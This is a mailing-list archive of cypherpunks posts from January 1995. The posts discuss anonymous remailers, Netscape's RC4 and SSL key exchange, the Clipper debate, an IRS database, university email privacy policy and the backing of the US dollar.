From: dmandl@bear.com (David Mandl)
Date: Fri, 20 Jan 95 06:57:52 PST
To: cypherpunks@toad.com
Subject: And another thing (Hakim Bey)
Message-ID: <9501201448.AA13298@yeti.bsnet>
MIME-Version: 1.0
Content-Type: text/plain


Also, the current issue of "Axcess" magazine (a slick cyber-zine)
has an interview with Hakim Bey in which he mentions the cypherpunks
as one of the few groups doing something worthwhile in cyberspace,
or words to that effect.  I'd post the short passage, but the copy
emailed to me by the editor was garbled (heh).

   --Dave.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Jan 95 06:52:30 PST
To: cypherpunks@toad.com
Subject: Re: T.A.Z. on Disk
Message-ID: <199501201451.JAA01734@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Jan 1995 Mark Grant <mark@unicorn.com> said: 
 
 
Another source is via Nesta Stubbs inspirational home page: 
 
     http://www.mcs.com/~nesta/home.html 
 
The NO address is referenced by Nesta, stylistically inimicably.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brett Turcotte" <turcotte@io.com>
Date: Fri, 20 Jan 95 08:48:00 PST
To: cypherpunks@toad.com
Subject: Re: "Disclosing" private email
Message-ID: <199501201647.KAA01769@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


Arthur Chandler posted to the list:
>   Greetings! I'd like to solicit your/our best thoughts on the following
> message. San Francisco State University is considering a policy of
> "disclosing" private email to outside agencies.  I'm aware that such a
> policy is yet another argument for using crypto; and the last cypherpunks
> meeting gave some encouraging instances of "transparent" encryption
> schemes that are not a hassle or a fear-barrier for newbies. 
>   But if you could post or private email me your thoughts about the 
> legal/ethical aspects of "disclosure," I'd be much obliged.
>   I've put a few of my own concerns at the end of the enclosed quote.
> 
It is probably a CYA move on the part of the University....if someone 
at SFSU is plotting the overthrow of our (or any other) government, 
engaging in espionage, child porn, etc. and using their Internet 
account, SFSU admin probably wants a way that they don't get held 
liable.

However, my view of this is that is sucks.
> 
> ---------- Forwarded message ----------
> 
> >From: "Deirdre C. Donovan" <deirdre@mercury.sfsu.edu>
> >
> >I am rewriting the information handouts which we here in San Francisco
> >give out to our students when they apply for Internet access accounts.
> >The issue with which I am struggling is one of privacy.  I have heard of
> >universities (anecdotally only) where the administration reserves the
> >right to read E-mail.  Here, we are leaning more toward something like the
> >paragraph below, which is taken verbatim from an Indiana University draft
> >document.
> >
> >        IU computing centers will maintain the confidentiality of all
> >        information stored on their computing resources.  Requests for
> >        disclosure of confidential information will be reviewed by the
> >        administrator of the computer system involved.  Such requests
> >        will be honored only when approved by University officials
> >        authorized by the [President] of the campus involved, or when
> >        required by state or federal law.  Except when inappropriate,
> >        computer users will receive prior notice of such disclosures.
> >
> 
>    I'm uneasy about the chain of "prior notice":
>   
>    1) Does this policy give university administrators the power to read
> private email before the decision is made to "disclose" it to outside
> persons or agencies? 
>  
It would have to...otherwise how would they know if they needed to 
disclose it.
>    2) Does this "prior notice" mean "We're going to do it" or "We plan to do 
> it, and if you disagree, let's discuss it before we release it"?
>   
From their perspective, prior notice would probably mean they tell 
you before they do it.  While I don't have experience specifically 
with SFSU, it seems as though large organizations tend to do whatever 
they please. 
>    3) What constitutes "inappropriate"?
> 
> 
Probably anything that is involved in an active criminal 
investigation.
> 
Note that any thing in this message is just my opinion, and most 
assurdly could prove to be different when exposed to the real world!!

Brett Turcotte
turcotte@io.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Fri, 20 Jan 95 08:19:56 PST
To: ecarp@netcom.com
Subject: Re: Remailer-on-a-CD
Message-ID: <9501201619.AA01776@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


Ed wrote:
>If you look out on ftp.netcom.com:/pub/ec/ecarp/linux*, you'll find a bare-
>bones Linux set that will install right in a DOS filesystem (it's a .ZIP file).
>It's intended for SLIP clients, but it could easily be adapted for setting
>up an "instant remailer".

I saw your announcement on comp.os.linux.announce right after suggesting the
"instant remailer" idea. (what timing!)  Already got it, and plan on playing
with it a little bit to see what fun we could have.  (5-floppy remailer
install, anyone?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalicqui@prairienet.org (Jeff Licquia)
Date: Fri, 20 Jan 95 08:27:16 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: The Remailer Crisis
Message-ID: <9501201626.AA03495@firefly.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


James wrote:
>Now this is OK if one wishes to run linux, and have a
>remailer as one hobby in addition to the main use of the
>box, but it is still a bit much to pay for a dedicated 
>remailer.
>
>Now I just do not like linux.  Sure it is a great
>operating system but it will not run codewright
>
>(Vi causes mental degeneration.  Even though I detest,
>loath, and hate vi, vi takes up so much brainspace that
>I find myself issueing vi commands in editors that I 
>use much more, and vastly prefer to vi.  Vi is evil.)
>
>Therefore there is no way in the world I am going to
>waste a full internet connection and a PC on linux.

Would it be better if you didn't have to dedicate your box to Linux, but
just ran it every so often when you weren't playing with Codewright?  If you
had some store-and-forward mail system (like UUCP or Fido), you wouldn't
need to say goodbye to DOS/Windows.

I envision a setup right now where you could (if you wanted) type "remailer"
at the DOS prompt to bring the remailer up.  The screen would show a
monitor-type program, with a menu option to "R)eboot" to DOS again (or you
could just hit Ctrl-Alt-Del).

Oh, and I'd probably package a much nicer editor than vi with it.  Believe
it or not, the state of Unix editors has progressed beyond vi (and even
emacs).  But that's assuming you'd need to pull up an editor at all...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Fri, 20 Jan 95 03:34:50 PST
To: cypherpunks@toad.com
Subject: Netscape, RC4, key exchange?
Message-ID: <19875.9501201052@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

grendel@netaxs.com wrote:
> aba@atlas.ex.ac.uk wrote:
> > I have code to generate the RSA key pairs and modulus, what I am
> > looking for is code to factorise a number using one of the better
> > algorithms (quadratic sieve, etc.).
>
>	It's been established that the encryption in Netscape is 40 bit 
>RC4, not 40 bit RSA, [...]

Ok, so Netscape (the exported version only?) uses 40bit RC4 for
encryption, but what about key exchange?  RC4 is a stream cypher so
both the receiver and sender need to know the key.  Does anybody know
what method Netscape uses to exchange keys DH, RSA, other? and what
key sizes?

Adam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUALx+TkSnIuJ1VakpnAQEuBQP/TAiX81goT8r3KnvFh3WCm6TvzjUNAaEl
G8NI5ELom8CWgIYp1uli+V+s0nRgZCKfZAvfeQrG97p2blSK0tOsZyV3E6cYKgXo
yGcGUJZ8UdvBL0A93LJcU4LZEUITcC9/3HS09QD2oZBGzSettHk3nwKMmEer65OU
QLsrRildnuw=
=3vQF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: habs@cmyk.warwick.com (Harry S. Hawk)
Date: Fri, 20 Jan 95 08:09:07 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: AT&T IVES chip
In-Reply-To: <9501192243.AA21298@toad.com>
Message-ID: <9501201903.AA04432@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain




> The IVES chip will be use in AT&T cable-TV-boxes this year.
> 
> It is available to OEM's for Internet data security applications.
> 
> IVES uses algorithms licensed from RSA.

This seems like good news..

e.g., cable systems are installing phone systems on the cable and
doing transactions via the cable (pay per view, home shopping, etc.)

A fear of mine was the Clipper was intended as the encryption standard
for all of this. Since AT&T appears to have a chip set that uses
RSA I consider this good...

Assuming it doesn't have escrow, etc.

Recall one of the major current vendors of cable converter boxes has
licensed clipper. (I forget which one).

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Connie Sadler <SADLER_C@HOSP.STANFORD.EDU>
Date: Fri, 20 Jan 95 11:31:52 PST
To: cypherpunks@toad.com
Subject: IRS "DataBase"
Message-ID: <B66ZVPAGGZZG*SADLER_C@HOSP.STANFORD.EDU>
MIME-Version: 1.0
Content-Type: text/plain


    
    In reference to the IRS database, I heard this announced on the radio 
    this morning - that the database has existed for years and that it is 
    being worked currently rather enthusiastically. The news announcer 
    somewhat eggagerated the comment that followed which seemed to make 
    clear the fact the we members of "John Q. Public" would NOT have access 
    to these records to review or correct them. The DJ and others picked it 
    up and talked about it afterwards and obviously did not approve. I 
    believe that the IRS is exempt from many laws, so is this for real???
    
    Digital Cash? Probably.
    Anonymous Buying? Wishful Thinking?
    
    Why not just get 10% tax from everyone and be done with it?
    
    Connie
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Fri, 20 Jan 95 11:20:54 PST
To: cypherpunks@toad.com
Subject: Cone order?
Message-ID: <199501201920.LAA26763@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Are these two stories related?


Associated Press reports on 1/20/95: 

>Hewlett-Packard Co. has been awarded a $672 million contact to build a 
>computer system linking 20,000 terminals for the military, Sen. Bob Smith 
>announced. 
   
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
It was previously reported:

>From rsalz@osf.org
>Date: Thu, 19 Jan 95 14:25:01 -0500
>From: Rich Salz <rsalz@osf.org>
>To: cypherpunks@toad.com
>Subject: Re: Cone of silence update
>
>---------- Begin Forwarded Message ----------
>Date: Wed, 18 Jan 95 21:03:02 -0500
>From: burton@het.brown.edu (Joshua W. Burton)
>To: silent-tristero@world.std.com
>Subject: Cone of silence update

[...]

>GOVERNMENT'S SECRETS FLOW THROUGH AN INTERNET CLONE
>
>WASHINGTON - When the US intelligence community recently decided to
>modernize the way it communicates, it did what countless other 
>government agencies, businesses and individuals have done over the
>last few years:  it turned to the Internet.
>
>But the regular Internet wouldn't do.  For spies and other government
>officials concerned about secrecy, that very public, very uncontrollable
>global mesh of computer networks was too risky a place to do business.
>
>So the intelligence community created its own Internet.
>
>Dubbed Intelink and based on the same technology used to run and
>navigate the original Internet, this new network for sharing supersecret
>information---including satellite imagery and video footage---officially
>began operating just a few weeks ago.
>
>When the bugs are worked out and a final system is in place, it will 
>allow analysts, policy-makers, military officials and soldiers in the
>field to tap quickly and directly into classified information at the
>Central Intelligence Agency, the National Security Agency, the Pentagon
>and diverse other parts of the national security bureaucracy.

[...]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 20 Jan 95 11:32:04 PST
To: cypherpunks@toad.com (cypherpunks)
Subject: Re: Electronic cash illegal? (fwd)
Message-ID: <9501201930.AA01571@doom>
MIME-Version: 1.0
Content-Type: text/plain



Derek writes:
> > As far as I know, the legal definition of a "dollar" in the US is still a
> > certain weight of silver, and payment in silver legally satisfies debts;
> > under current silver prices, that probably costs more than a 
> > $1 US Federal Reserve Note, so nobody bothers.
> 
> Uhh, no, US currency does not have any backing.  I believe it was
> Nixon who stopped it, possibly even earlier than him.  There _used_ to
> be Gold- and Silver-backed dollars, but no longer.

Correct.  Nixon dismantled the Breton Woods system in (I think) '71.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Fri, 20 Jan 95 11:35:53 PST
To: cypherpunks@toad.com
Subject: *More* wiretaps?
Message-ID: <199501201935.LAA03670@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Associated Press reported on 1/20/95:
 
>Secretary of State Warren Christopher Friday announced 
>plans to combat narcotics smuggling and terrorism with tougher 
>laws and sentences and tighter control on visas for entering the 
>United States. 
>   
>A senior State Department official said wiretapping was among the 
>measures to be proposed to the Republican-controlled Congress. The 
>official said there were ways to use wiretaps without violating 
>Supreme Court restrictions. 


Since wiretapping on court order from their no-questions-asked secret 
court is already allowed, can they mean anything other than wiretapping 
without court order?

Can somebody explain to me why the Clinton administration is
considered "liberal"?  Why the Republicans are considered
"conservative"?








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 20 Jan 95 11:39:14 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: The Remailer Crisis
In-Reply-To: <199501200033.QAA10651@largo.remailer.net>
Message-ID: <9501201936.AA01622@doom>
MIME-Version: 1.0
Content-Type: text/plain



>    From: frissell@panix.com (Duncan Frissell)
> 
>    I offer to pay for and operate a remailer account on any system that will
>    have me.
> 
> best.com, based in Mt. View, CA.  Mail to postmaster@best.com, or try
> the other standard extensions.

As it happens, I just signed up for a SLIP account at Best.  I'm using
their standard dial-up service, but they also offer a dedicated 28.8
connection for $450 setup and $60/mo.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Jan 95 08:39:48 PST
To: cypherpunks@toad.com
Subject: Crypto Anarchy/Libertarians in WSJ
Message-ID: <199501201639.LAA14304@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Jan 1995 frissell@panix.com (Duncan Frissell) said: 
 
 
Duncan aptly points to the WSJ article, lots of c'punk topics mentioned. 
 
For email copy send blank message with subject:  LIB_yep 
 
 
Meanwhile, here's a taste: 
 
 
   Mr. Willis says the libertarian concept has particular 
   appeal to people in the computer industry. "We have more 
   members in one computer company in Seattle than in some 
   whole counties, and that company is Microsoft," he says. 
 
 
   Indeed, when Mr. Frezza, the Philadelphia computer 
   consultant, last month launched a computer network of like- 
   minded thinkers called DigitaLiberty, he was so overwhelmed 
   with responses, especially from college students, that he 
   had to temporarily shut down the group's electronic 
   mailbox. 
 
 
   One member of DigitaLiberty is Bruce Fancher, a 23-year-old 
   who in the late 1980s earned brief notoriety as a hacker 
   who broke into computer systems, though he was never 
   charged with a crime. He is president of a computer 
   communications company called Phantom Access Technologies 
   Inc. "Being involved in computers or the Internet, you 
   inevitably move toward being a libertarian," he says. "It 
   is basically possible to keep all of your secrets from 
   prying eyes, particularly the prying eyes of the federal 
   government." 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kipp@warp.mcom.com (Kipp E.B. Hickman)
Date: Fri, 20 Jan 95 12:25:09 PST
To: aba@atlas.ex.ac.uk
Subject: Re: Netscape, RC4, key exchange?
Message-ID: <9501201949.AA17175@warp.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <19875.9501201052@exe.dcs.exeter.ac.uk>, you write:
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> grendel@netaxs.com wrote:
> > aba@atlas.ex.ac.uk wrote:
> > > I have code to generate the RSA key pairs and modulus, what I am
> > > looking for is code to factorise a number using one of the better
> > > algorithms (quadratic sieve, etc.).
> >
> >	It's been established that the encryption in Netscape is 40 bit 
> >RC4, not 40 bit RSA, [...]
> 
> Ok, so Netscape (the exported version only?) uses 40bit RC4 for
> encryption, but what about key exchange?  RC4 is a stream cypher so
> both the receiver and sender need to know the key.  Does anybody know
> what method Netscape uses to exchange keys DH, RSA, other? and what
> key sizes?

If you read the spec (http://www.mcom.com/info/SSL.html), you will see
that SSL uses RSA public key encryption for key exchange. However, the
protocol is slightly more general than that, so if there is a
different public key algorithm it is possible for SSL to support it.

---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 20 Jan 95 09:03:27 PST
To: s675570@aix1.uottawa.ca
Subject: Re: T.A.Z. on Disk
In-Reply-To: <Pine.3.89.9501200130.A35161-0100000@aix1.uottawa.ca>
Message-ID: <199501201702.MAA23498@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Of course, one could always just buy them on paper (remember that?)

Actually, you can't (right now.)  The publisher is out of stock, expects
to get more in in March.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Jan 95 09:07:23 PST
To: cypherpunks@toad.com
Subject: IBM Contra Beltway
Message-ID: <199501201706.MAA17161@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan or others may give a more elegant report on the Clipper debate here
in NYC last night. 
 
 
My pleasant surprise was to see the IBM rep, William Whitehurst, far
outpace the inside the beltway types, EFF's Daniel Weitzer, the White
House's Michael Nelson, FBI's Kallstrom and ex-NSA Stewart Baker, as well
as the local urbane handsome attorney-mathematician moderator, Albert
Wells, who baby-talked the suits through the arcana. 
 
 
Mr. Whitehurst showed more intelligence about crypto -- domestically,
politically, economically and politically -- than any of the others.  No
flash, no preening, just hard-nosed reports on what's happening, and what's
not, due to USG cupidity, with the international spread of the heinous
munition.  He said industry is impatiently waiting for the USG to cooperate
or get the fuck out of the way.  Well, not quite, but close. 
 
 
The others seemed entranced by the domestic political morass. 
 
 
Kallstrom recited the oft-riden horse-threats, some miscreant clapped, and
he said, "child pornographer".  All laughed or winced or stared in
pin-stripped disbelief at the disrespect shown. 
 
 
Mr. Weitzer recited that the crypto genie is out of the bottle.  Kallstrom
said over my dead body or something like that, glowering at the crowd. 
 
 
The dapper man in front of me pulled up his sock to show his ankle holster.
 Protecting the nation's chief protector against high-criminals.  I ran out
before getting plugged "accidently". 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 20 Jan 95 09:10:05 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: traffic analyzing Chaum's digital mix
In-Reply-To: <199501201624.IAA13926@jobe.shell.portal.com>
Message-ID: <199501201708.MAA23560@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| -----BEGIN PGP SIGNED MESSAGE-----
| 
| From: Wei Dai <weidai@eskimo.com>
| > I have been thinking about the problem of traffic analysis of a 
| > remailer.
| > [...]
| > The basic approach is to use this raw traffic information to calculate a 
| > SCORE for each user of the remailer with respect to Alice, where the 
| > user with the highest SCORE is the person Alice is most probably 
| > communicating with.  The idea is that with a Chaumian mix, every time 
| > Alice sends a message to Bob there is always a pattern of Alice sending 
| > a message to the mix, followed by Bob receiving a message from the mix 
| > during the next batch.  By counting the number of such correlations for 

| This sounds like a good idea.  It was very interesting to see your
| earlier result on the impact of dummy messages on this approach.  Even a
| relatively small number of batches without dummy messages allows
| continual accumulation of incriminating information.

	It would seem that Alice can protect Bob (or Bob can protect
himself) by engaging in multiple conversations through the mix.  I was
thinking earlier about the concept of bit buckets; people who agree to
get mail that they ignore.  Alice could, when talking to Bob, send
copies along the way to Fred, George, and Harry, each of whom would be
running a mailbot that sees the mail is not for them, and deletes it
(or, perhaps better, generates a response of encrypted nonsense to
flow through the mix for a while.)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 20 Jan 95 12:21:09 PST
To: perry@imsi.com
Subject: Re: Electronic cash illegal? (fwd)
In-Reply-To: <9501201950.AA06204@snark.imsi.com>
Message-ID: <9501202019.AA01877@doom>
MIME-Version: 1.0
Content-Type: text/plain



> Re-read what was originally written carefully -- it claims neither
> that the dollar is backed nor that paper dollars are exchangable for
> silver.
> 
> .pm

I interpreted ". . . the legal definition of a 'dollar' in the US is
still a certain weight of silver" to imply both.  Apologies if I
misconstrued.

> > Mark Chen says:
> > Derek writes:
> > > > As far as I know, the legal definition of a "dollar" in the US is still a
> > > > certain weight of silver, and payment in silver legally satisfies debts;
> > > > under current silver prices, that probably costs more than a 
> > > > $1 US Federal Reserve Note, so nobody bothers.
> > > 
> > > Uhh, no, US currency does not have any backing.  I believe it was
> > > Nixon who stopped it, possibly even earlier than him.  There _used_ to
> > > be Gold- and Silver-backed dollars, but no longer.
> > 
> > Correct.  Nixon dismantled the Breton Woods system in (I think) '71.
> > 
> > 
> > --
> > Mark Chen 



--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Fri, 20 Jan 95 10:45:38 PST
To: cypherpunks@toad.com
Subject: IRS to keep unreviewable secret dossiers on US citizens
Message-ID: <9501201845.AA09218@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from : St Paul Pioneer Press, Jan 29, 1995

"IRS plans to collect more data on individuals to nab tax cheats"

a "vast expansion of secret computer database of information it
keeps on virtually all Americans" will include "credit reports,
news stories, tips from informants,  and real estate, motor vehicle
and child support records, plus conventional Govt financial data"

"Any individual who has business and/or financial activities can
expect upgraded agency reports to be put to IRS auditors promptly"

Here's the kicker: "Although agency officials concede that some of
the data collected will be inaccurate, taxpayers will not be allowed
to review or correct it"                         ^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^
So much for the FOIA.

------------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 20 Jan 95 12:49:29 PST
To: cypherpunks@toad.com
Subject: RE: IRS "DataBase"
Message-ID: <9501202049.AA05863@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



A funny -    I just saw this in some email:

	"If guns are outlawed, how will liberals collect taxes?" --- A. Nonymous

 (Sorry, I didn't mean to bring up an crypto-unrelated political 
party/tax discussion.   This is *strictly* a matter for Logic and Anarchy.)

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 20 Jan 95 12:57:10 PST
To: Mark Chen <chen@intuit.com>
Subject: Re: Electronic cash illegal? (fwd)
In-Reply-To: <9501201930.AA01571@doom>
Message-ID: <Pine.SUN.3.91.950120124532.10660A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 20 Jan 1995, Mark Chen wrote:

> Derek writes:
> > . . .
> > Uhh, no, US currency does not have any backing.  I believe it was
> > Nixon who stopped it, possibly even earlier than him.  There _used_ to
> > be Gold- and Silver-backed dollars, but no longer.
> 
> Correct.  Nixon dismantled the Breton Woods system in (I think) '71.

Well, sort of.  My understanding is that the US dollar is still
backed by gold on some theoretical bases.  Nixon just closed the
``gold window.''  That is, foreigners are no longer allowed to
get gold for greenbacks as was the case up until then.  Of course,
plain old Americans haven't been allowed to do that for the last
60 years or so.

As for FRNs, they are ultimately backed by a promise to pay in
``lawful money,'' i.e., US dollars.  Can you say Panzi?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Fri, 20 Jan 95 12:06:24 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: The Remailer Crisis
Message-ID: <v02110105ab45c76cf24e@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:39 PM 1/20/95, Mark Chen wrote:
>>    From: frissell@panix.com (Duncan Frissell)
>>
>>    I offer to pay for and operate a remailer account on any system that will
>>    have me.
>>
>> best.com, based in Mt. View, CA.  Mail to postmaster@best.com, or try
>> the other standard extensions.
>
>As it happens, I just signed up for a SLIP account at Best.  I'm using
>their standard dial-up service, but they also offer a dedicated 28.8
>connection for $450 setup and $60/mo.

You know, these fees everybody keeps quoting sound remarkably like the cost
of a modem, the installation of a new phone line, plus a reasonable amount
of profit. So why don't a bunch of you, say in the Bay Area, get together
to get a small subnet, each buy your own pair of modems, pay for the added
phone line, and install the whole shootin' match in Tim's house?

>Mark Chen

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Fri, 20 Jan 95 10:48:26 PST
To: cypherpunks@toad.com
Subject: IP security drafts
Message-ID: <9501201842.AA19064@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


The latest version of the proposal Bill Simpson and I have made for
the IPv4 security protocols (which are more or less the same as the
IPng proposals) are now available from the internet drafts directories
near you.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 20 Jan 95 11:00:02 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
In-Reply-To: <9501201845.AA09218@toad.com>
Message-ID: <9501201859.AA06028@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



xpat@vm1.spcs.umn.edu says:
> Excerpts from : St Paul Pioneer Press, Jan 29, 1995
> 
> Here's the kicker: "Although agency officials concede that some of
> the data collected will be inaccurate, taxpayers will not be allowed
> to review or correct it"                         ^^^^^^^^^^^^^^^^^^^
> ^^^^^^^^^^^^^^^^^^^^^^^
> So much for the FOIA.

The privacy act and FOIA make that more or less illegal -- if they are
keeping information on you, with certain law enforcement related
exceptions they have to let you see it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Grant <mark@unicorn.com>
Date: Fri, 20 Jan 95 06:32:13 PST
To: cypherpunks@toad.com
Subject: Re: T.A.Z. on Disk
Message-ID: <Pine.3.89.9501201432.A753-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 20 Jan 1995, Angus Patterson wrote:

> I also saw another e-book site that had some more of his stuff, can't
> remember what it was though.

There's some more on the WWW at http://www.uio.no/~mwatz/bey/index.html.

		Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Fri, 20 Jan 95 12:46:08 PST
To: cypherpunks@toad.com
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
Message-ID: <9501202045.AA10950@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


perry@imsi.com says:
>xpat@vm1.spcs.umn.edu says:
>> Excerpts from : St Paul Pioneer Press, Jan 29, 1995
>>
>> Here's the kicker: "Although agency officials concede that some of
>> the data collected will be inaccurate, taxpayers will not be allowed
>> to review or correct it"                         ^^^^^^^^^^^^^^^^^^^
>> ^^^^^^^^^^^^^^^^^^^^^^^

>The privacy act and FOIA make that more or less illegal -- if they are
>keeping information on you, with certain law enforcement related
>exceptions they have to let you see it.

I should add that later in the article it suggests the scenario of
select information from the database being used in an audit, and
you would be able to contest the specific information they use
against you, but you would not be able to view any of the raw data.
                     ^^^^^^^^^
It sounds like this amounts to "we don't have the info until we use
it against you".

--------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Fri, 20 Jan 95 11:54:06 PST
To: cypherpunks@toad.com
Subject: internet world mag
Message-ID: <199501201953.OAA09328@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


>>Sorry to bother you but can you tell me how to get this mag ?
>>thanks

If you can't find it at your local bookstore then contact:
Internet world p.o. box 713, Mt Morris, il, 61054, USA or via email
74671.3430@compuserve.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
wizard@alpha.c2.org
Give me the liberty to know, to utter, and to argue freely
according to conscience, above all liberties.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 20 Jan 95 11:50:26 PST
To: chen@intuit.com (Mark Chen)
Subject: Re: Electronic cash illegal? (fwd)
In-Reply-To: <9501201930.AA01571@doom>
Message-ID: <9501201950.AA06204@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Re-read what was originally written carefully -- it claims neither
that the dollar is backed nor that paper dollars are exchangable for
silver.

.pm

Mark Chen says:
> Derek writes:
> > > As far as I know, the legal definition of a "dollar" in the US is still a
> > > certain weight of silver, and payment in silver legally satisfies debts;
> > > under current silver prices, that probably costs more than a 
> > > $1 US Federal Reserve Note, so nobody bothers.
> > 
> > Uhh, no, US currency does not have any backing.  I believe it was
> > Nixon who stopped it, possibly even earlier than him.  There _used_ to
> > be Gold- and Silver-backed dollars, but no longer.
> 
> Correct.  Nixon dismantled the Breton Woods system in (I think) '71.
> 
> 
> --
> Mark Chen 
> chen@intuit.com
> 415/329-6913
> finger for PGP public key
> D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Fri, 20 Jan 95 12:59:16 PST
To: cypherpunks@toad.com
Subject: Place for WWW info/ stuff
